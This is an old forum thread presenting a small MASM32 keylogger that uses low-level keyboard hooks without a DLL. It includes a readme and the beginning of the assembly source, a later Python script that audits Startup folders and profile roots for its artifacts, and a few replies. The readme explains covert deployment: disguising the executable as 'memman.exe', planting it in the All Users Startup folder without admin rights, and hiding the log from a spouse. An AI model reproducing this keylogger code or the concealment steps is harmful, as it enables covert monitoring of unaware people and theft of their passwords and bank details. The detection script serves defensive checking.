The Programs and Files included are Copyright 2005, by ZOverLord
This is a Proof Of Concept for Educational Purposes ONLY!

Notes:

This program is 4K big, as in 4,096 bytes and can do ANYTHING other Key-Loggers
claim, this is Version 1.0, a Stealth version will be next to show Hiding concepts.

The program was created because MANY people claimed that you could NOT use a
Stand-Alone program ("Without the Global hook procedure being located in a DLL") to do low-level
keyboard Key-Logging. As I say.....

"We Don't NEED NO STINKIN DLL!"

The program(s): they both produce the same output, one is Raw ASM and the other uses
INVOKES. This was done in order to try and HELP others learn ASM a little
better, instead of trying to make ASM look like some FRICKEN C++ MACRO from HELL Language, lol

In any event, the RAW version has more comments if you're trying to figure out
how the MAGIC is done. There is some MASS confusion with MANY seasoned programmers
as to just HOW to get some Data, when the process is NOT in your CONTEXT.

LOL, Hope this helps BOYS! Ok, you need the latest and greatest MASM32 if you want
to compile this and LEARN SOMETHING! Download and install it from here:

Once you have done that you can click on the C:\ZKeyLog\ZKeyLogV1.bat file and
it will build BOTH versions, as well as compile an additional Library needed in
msvcrt.inc, which will create a msvcrt.lib file in the c:\ZKeyLog folder as well.

No matter if you re-compile the programs or not the following directions will help.

Decide which of the two versions you wish to use, if needed to be more Stealth like
make a copy of either ZKeyLogV1Raw.exe or ZKeyLogV1.exe and rename it to something
which won't raise EyeBrows like memman.exe, for example.

REMEMBER, anytime you do Key-Logging you run the RISK of IF someone gets into
your system and the log contains sensitive data such as bank account info or
passwords, you could cause Yourself some MAJOR Grief, we take NO responsibility
on the use of this. You may be better off re-compiling this and changing the log
file to ANOTHER name, just in case this Key-Logger gets Popular, and people start
to look for the log name.

Now, IF the program is NOT placed in a StartUp Folder the LOG will be in the
same folder as the program is run, again the DEFAULT log name is ZKeyLog.txt.

If the program is placed in a Startup Folder, it will be in the Default PATH of
that user. So for example if you placed the program in the ALL Users Startup
folder, then each user would have a LOG file called ZKeyLog.txt in their default
path.

You can HIDE the log file by setting the file to be hidden, this way users will
not know it is there, like your Cheating Wife or Husband for example ;-)

If you have any Questions, open the ZKeyLogV1Raw.asm file in notepad, it has more
comments than the ZKeyLogV1.asm file. If you are still STUCK and need answers
email me at ZOverLords@Yahoo.com.

Enjoy, I hope this helps others learn the ASM Language, It is amazing what you
can do with ASM with such a small FootPrint. Enjoy!

First, you will need to build a NEW library that is not currently in MASM32 called msvcrt.lib from this file called msvcrt.inc:

Third, here is the Low-Level MASM32 source, which is called ZKeyLogV1Raw.asm

Code:

;*******************************************************************************************
; (BEST Viewed with NOTEPAD)
; CopyRight 2005, by ZOverLord at ZOverLords@Yahoo.com - ALL Rights Reserved
;
; "We Don't NEED no STINKIN DLL!"......ENJOY! visit http://testing.OnlyTheRightAnswers.com
;
; Proof Of Concept of using Low-Level Hooks without using any DLL for the Hook
; This Program is for Educational Proof Of Concept Use ONLY!
;
; This Program compiles in 4K, get it that's 4,096 Bytes. I got TIRED of all these folks
; who need a FAT program as well as a FAT DLL to create a Key-Logger so in frustration
; this proof of concept was created. Log Items include:
;
; Date-Time Stamps, Program Name, Window Title, Window Class, Domain Name, Computer Name
; User Name as well as the ability to be placed in StartUp Folders for ANY and/or ALL
; users. There is NOT any requirement for this to run as ADMIN, ANYONE can place it in
; the startup folder of any user, or for all users.
;
; The Logfile is named ZKeyLog.txt and separate logs can be kept for separate users; this
; can be done automatically by simply placing the program in the:
;
; C:\Documents and Settings\All Users\Start Menu\Programs\Startup folder
;
; C:\Documents and Settings\?USER?\ folder as ZKeyLog.txt
; ("You can change the File to Hidden if needed")
;
; A Hot-Key of [CTRL]-[ALT]-[F11] will turn the Key-Logger Off
;
; There are two flavors one Raw ASM and one using INVOKES, Raw has more comments, low-level.
;
; You can rename the EXE file to something NOT so obvious if needed, read the AReadMe.txt
;
;*******************************************************************************************
.386
.model flat, stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\advapi32.inc
include msvcrt.inc

main:
push offset onlyOneCopy ; check to make sure we are the only copy
push 0 ; of this program running for this user
push 0 ; for fast user switching we can still have
call CreateMutexA ; one copy per user running with this check
call GetLastError ; but if this user is running one already. we exit
cmp eax,ERROR_ALREADY_EXISTS
je more_than_one_copy

xor ebx, ebx ; Zero Out ebx

push VK_F11 ; this will switch logger off using CTRL+ALT+F11 together
push MOD_CONTROL or MOD_ALT
push 0badfaceh ; name of register key -> "0BADFACE"
push ebx ;
call RegisterHotKey ; we got a new hot key

call GetForegroundWindow ; get handle for currently used window ( specific to NT and after )
cmp [hCurrentWindow], eax ; if its not different to last one saved..
je no_window_change ; bypass all the headings

lea esi, [hCurrentThreadPiD] ; get the processid that sent the key
push esi ; using the HWND we got earlier from
mov eax, [hCurrentWindow] ; our GetForegroundWindow call
push eax ; we need it to get the program exe name
call GetWindowThreadProcessId

mov ebx, hCurrentThreadPiD ; remember we are NOT using a DLL so.....
push ebx ; we need to use ToolHelp procs to get
push TH32CS_SNAPMODULE ; the program exe name of who sent us
call CreateToolhelp32Snapshot ; this key
mov hSnapShot,eax ; save the ToolHelp Handle to close later

mov hmodul.dwSize, sizeof MODULEENTRY32 ; need to initialize size or we will fail

push offset hmodul ; first Module is always module for process
mov eax, [hSnapShot] ; so safe to assume that the exe file name here
push eax ; will always be the right one for us
call Module32First

mov eax, [hSnapShot] ; we are done with ToolHelp so we need
push eax ; to tell it we wish to close
call CloseHandle

Please let me know what you think. The goal was to try and show others how easy it is to use Low-Level Global Hooks without needing a DLL, and to show how to get data from other programs that are not in your context when using Global Hooks and no dll.

This example can be used as a baseline for similar code in C++, there really is no requirement to understand ASM or MASM32 for that matter to see how this works.

Any Comments or Questions, Please ask or Post. If you think this example ROCKS, please rate this thread; again, thanks

Thanks

ZOverLord
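A defender-side check that follows from the locations the post gives (an executable dropped in a per-user or All Users Startup folder for persistence, the default log ZKeyLog.txt written to each user's profile root, and the hidden attribute used to conceal it). This is an added example in Python, not code from the original post or the ZKeyLog project. It assumes the XP-era profile layout quoted in the post (C:\Documents and Settings\...), and it runs against a constructed copy of that layout in a temporary directory, so every profile name and file in it is sample data; the hidden-attribute check relies on `st_file_attributes`, which `os.stat` exposes only on Windows, and reports False elsewhere rather than guessing.

```python
"""
Audit user profile roots for the artifacts described in the ZKeyLog post:
an autostart executable in a Startup folder, the fixed log name ZKeyLog.txt
in a profile root, and whether either carries the Windows hidden attribute.

Added example, not part of the original post or the ZKeyLog project.
"""
import os
import shutil
import stat
import tempfile

LOG_ARTIFACT = "zkeylog.txt"  # default log name stated in the post (compared case-insensitively)
# Assumption: file types Windows will launch from a Startup folder and that merit review.
EXE_SUFFIXES = {".exe", ".com", ".scr", ".bat", ".cmd", ".pif"}
STARTUP_REL = os.path.join("Start Menu", "Programs", "Startup")


def is_hidden(path):
    """True if the file has the Windows hidden attribute; False on other OSes."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    return bool(attrs & getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0))


def audit(profiles_root):
    """Return sorted (category, path, hidden) tuples for every profile under profiles_root.

    startup_exe  - executable in <profile>\\Start Menu\\Programs\\Startup (runs at logon,
                   for every account when the profile is "All Users", no admin needed)
    log_artifact - ZKeyLog.txt sitting in the profile root, the default location the post gives
    """
    findings = []
    for profile in sorted(os.listdir(profiles_root)):
        profile_dir = os.path.join(profiles_root, profile)
        if not os.path.isdir(profile_dir):
            continue
        startup_dir = os.path.join(profile_dir, STARTUP_REL)
        if os.path.isdir(startup_dir):
            for name in sorted(os.listdir(startup_dir)):
                full = os.path.join(startup_dir, name)
                if os.path.isfile(full) and os.path.splitext(name)[1].lower() in EXE_SUFFIXES:
                    findings.append(("startup_exe", full, is_hidden(full)))
        for name in sorted(os.listdir(profile_dir)):
            full = os.path.join(profile_dir, name)
            if os.path.isfile(full) and name.lower() == LOG_ARTIFACT:
                findings.append(("log_artifact", full, is_hidden(full)))
    return sorted(findings)


def build_sample_tree():
    """Construct a throwaway tree mimicking the layout the post describes (sample data only)."""
    root = tempfile.mkdtemp(prefix="zkeylog_audit_")
    layout = {
        os.path.join("All Users", STARTUP_REL, "memman.exe"): b"MZ",  # renamed binary, per the post
        os.path.join("All Users", STARTUP_REL, "desktop.ini"): b"",   # benign, must not be flagged
        os.path.join("alice", "ZKeyLog.txt"): b"[constructed log]\r\n",
        os.path.join("bob", "ZKeyLog.txt"): b"",
        os.path.join("bob", "notes.txt"): b"",                        # unrelated file, not flagged
    }
    for rel, data in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    return root


def audit_sample():
    """Run audit() over the constructed tree and return root-relative, '/'-separated findings."""
    root = build_sample_tree()
    try:
        return [(cat, os.path.relpath(path, root).replace(os.sep, "/"), hidden)
                for cat, path, hidden in audit(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for category, rel_path, hidden in audit_sample():
        print(f"{category:<13} hidden={hidden!s:<5} {rel_path}")
```

On a live host the function would be pointed at the real profiles root (the post's `C:\Documents and Settings`, or `C:\Users` on later Windows, whose Startup folder lives under `AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup` rather than the XP path assumed here); the `desktop.ini` and `notes.txt` entries in the sample tree are there to show that only executables in Startup and the named log file are reported.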

December 31st, 2005, 09:29 PM

ZOverLord

Re: 4k Key-Logger Using (NO) DLL Example

This Project is now a featured article at RootKit.com

January 24th, 2006, 10:38 AM

Tanner85

Re: 4k Key-Logger Using (NO) DLL Example

Really interesting! When will you publish the next chapter? (stealth)?

September 17th, 2013, 12:00 AM

jimmaqualin

Re: 4k Key-Logger Using (NO) DLL Example

Quote:

Originally Posted by Tanner85

Really interesting! When will you publish the next chapter? (stealth)?

A Keylogger program also takes a screenshot of the PC monitor (from when you turn on the pc to when you turn it off) in stealth mode.

A keylogger, also known as keystroke logging, is a program installed on your computer unbeknownst to you that logs all key strokes typed into your computer, which are then viewed by a third party. Keyloggers are also capable of taking screen captures.